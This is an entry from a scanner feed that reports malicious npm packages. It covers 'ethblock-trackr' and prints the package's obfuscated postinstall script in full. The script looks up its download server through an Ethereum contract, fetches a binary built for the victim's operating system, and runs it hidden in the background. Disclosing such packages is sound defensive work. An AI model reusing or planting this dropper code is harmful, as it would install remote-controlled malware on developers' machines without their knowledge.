Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our 𝕏 / Twitter feed for updates.
ethblock-trackr:
Detected: 31 Oct 2024
Detected Date: 31 Oct 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm
The code downloads a remote executable file based on the user's operating system and executes it in the background. It retrieves an Ethereum contract's method, suggesting it could be involved in malicious or unauthorized blockchain interactions. Downloading and executing arbitrary code poses a significant security threat, as it can lead to unauthorized access or control over the system.
Install script:
node x6n40ewn.cjsconst _0x326e2e=_0x1e9d;(function(_0x715341,_0xbb49ac){const _0x48f59d=_0x1e9d,_0x3a217b=_0x715341();while(!![]){try{const _0xeb0c14=parseInt(_0x48f59d(0xb5))/0x1+parseInt(_0x48f59d(0xbc))/0x2*(parseInt(_0x48f59d(0xa0))/0x3)+parseInt(_0x48f59d(0xb1))/0x4*(parseInt(_0x48f59d(0xb8))/0x5)+parseInt(_0x48f59d(0x9f))/0x6+-parseInt(_0x48f59d(0x92))/0x7+parseInt(_0x48f59d(0xb2))/0x8*(-parseInt(_0x48f59d(0x8a))/0x9)+parseInt(_0x48f59d(0x93))/0xa*(parseInt(_0x48f59d(0x9c))/0xb);if(_0xeb0c14===_0xbb49ac)break;else _0x3a217b['push'](_0x3a217b['shift']());}catch(_0x585a1b){_0x3a217b['push'](_0x3a217b['shift']());}}}(_0x5b35,0x4f8aa));const {ethers}=require(_0x326e2e(0xa8)),axios=require(_0x326e2e(0x91)),util=require(_0x326e2e(0x95)),fs=require('fs'),path=require(_0x326e2e(0x9e)),os=require('os'),{spawn}=require(_0x326e2e(0x8b)),contractAddress=_0x326e2e(0xac),WalletOwner='0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84',abi=[_0x326e2e(0xb3)],provider=ethers[_0x326e2e(0x9a)]('mainnet'),contract=new ethers[(_0x326e2e(0x89))](contractAddress,abi,provider),fetchAndUpdateIp=async()=>{const _0x3a1fd3=_0x326e2e,_0x3c71a8={'ZREow':function(_0x54c650){return _0x54c650();}};try{const _0x3d0e05=await contract[_0x3a1fd3(0xa2)](WalletOwner);return _0x3d0e05;}catch(_0x1c5412){return console['error'](_0x3a1fd3(0x9d),_0x1c5412),await _0x3c71a8['ZREow'](fetchAndUpdateIp);}},getDownloadUrl=_0x41c931=>{const _0xb46ea1=_0x326e2e,_0x3b9187={'AlFXQ':_0xb46ea1(0xa9),'zxybJ':'linux','SJKwI':_0xb46ea1(0x96)},_0x2ae79b=os[_0xb46ea1(0xaf)]();switch(_0x2ae79b){case _0x3b9187[_0xb46ea1(0xbb)]:return _0x41c931+_0xb46ea1(0xab);case _0x3b9187[_0xb46ea1(0x8f)]:return _0x41c931+'/node-linux';case _0x3b9187[_0xb46ea1(0xa4)]:return _0x41c931+_0xb46ea1(0x88);default:throw new Error('Unsupported\x20platform:\x20'+_0x2ae79b);}},downloadFile=async(_0x3c7a99,_0x213a28)=>{const _0x3a8729=_0x326e2e,_0xe6423d={'zkkaT':_0x3a8729(0xa1),'IfOKF':function(_0x6603a8,_0x168827){return _0x6603a8(_0x168827);},'ronGl':_0x3a8729(0x8c),'iCrbd':_0x3a8729(0xa7)},_0x436b72=fs[_0x3a8729(0xae)](_0x213a28),_0x33b530=await _0xe6423d[_0x3a8729(0x8e)](axios,{'url':_0x3c7a99,'method':_0xe6423d[_0x3a8729(0xbd)],'responseType':_0xe6423d[_0x3a8729(0xa5)]});return _0x33b530[_0x3a8729(0xaa)][_0x3a8729(0xb6)](_0x436b72),new Promise((_0x512ef8,_0xc0241d)=>{_0x436b72['on']('finish',_0x512ef8),_0x436b72['on'](_0xe6423d['zkkaT'],_0xc0241d);});},executeFileInBackground=async _0x2cba57=>{const _0x48d761=_0x326e2e,_0x59fc63={'wpcjz':_0x48d761(0x9b),'xJSGa':_0x48d761(0xb9)};try{const _0x4b56de=spawn(_0x2cba57,[],{'detached':!![],'stdio':_0x59fc63[_0x48d761(0xb0)]});_0x4b56de['unref']();}catch(_0x33e65d){console[_0x48d761(0xa1)](_0x59fc63[_0x48d761(0xad)],_0x33e65d);}},runInstallation=async()=>{const _0x949794=_0x326e2e,_0x1bd0aa={'oDZKh':function(_0x426202){return _0x426202();},'vXffe':function(_0xfa75bd,_0x2220c9){return _0xfa75bd(_0x2220c9);},'yOkOW':function(_0x2b0c31,_0xd4c17a,_0x6821f2){return _0x2b0c31(_0xd4c17a,_0x6821f2);},'JIjUT':function(_0x3f8845,_0x24ecf6){return _0x3f8845!==_0x24ecf6;},'OBXgm':'win32','GcCLj':_0x949794(0xa3),'lbZbX':_0x949794(0xb4)};try{const _0xff3cef=await _0x1bd0aa[_0x949794(0xb7)](fetchAndUpdateIp),_0x2bfe45=_0x1bd0aa[_0x949794(0x90)](getDownloadUrl,_0xff3cef),_0x4e9517=os[_0x949794(0x8d)](),_0x330fcd=path[_0x949794(0xba)](_0x2bfe45),_0x9a81cb=path[_0x949794(0x94)](_0x4e9517,_0x330fcd);await _0x1bd0aa[_0x949794(0x99)](downloadFile,_0x2bfe45,_0x9a81cb);if(_0x1bd0aa[_0x949794(0xa6)](os[_0x949794(0xaf)](),_0x1bd0aa['OBXgm']))fs['chmodSync'](_0x9a81cb,_0x1bd0aa[_0x949794(0x98)]);_0x1bd0aa[_0x949794(0x90)](executeFileInBackground,_0x9a81cb);}catch(_0x1dd011){console[_0x949794(0xa1)](_0x1bd0aa[_0x949794(0x97)],_0x1dd011);}};function _0x1e9d(_0x1d2566,_0x1f3a7f){const _0x5b3582=_0x5b35();return _0x1e9d=function(_0x1e9d41,_0x4af0fe){_0x1e9d41=_0x1e9d41-0x88;let _0x447b77=_0x5b3582[_0x1e9d41];return _0x447b77;},_0x1e9d(_0x1d2566,_0x1f3a7f);}function _0x5b35(){const _0x38a239=['path','900246WCbHOG','942tgdQxi','error','getString','755','SJKwI','iCrbd','JIjUT','stream','ethers','win32','data','/node-win.exe','0xa1b40044EBc2794f207D45143Bd82a1B86156c6b','xJSGa','createWriteStream','platform','wpcjz','4PXZKyy','8qxrcDw','function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)','Ошибка\x20установки:','180336VvYNdZ','pipe','oDZKh','1624355Camaho','Ошибка\x20при\x20запуске\x20файла:','basename','AlFXQ','808PSLBmL','ronGl','/node-macos','Contract','398601wXgLct','child_process','GET','tmpdir','IfOKF','zxybJ','vXffe','axios','4489730YlJAeb','4710qAEoQj','join','util','darwin','lbZbX','GcCLj','yOkOW','getDefaultProvider','ignore','5357fFQLOo','Ошибка\x20при\x20получении\x20IP\x20адреса:'];_0x5b35=function(){return _0x38a239;};return _0x5b35();}runInstallation();
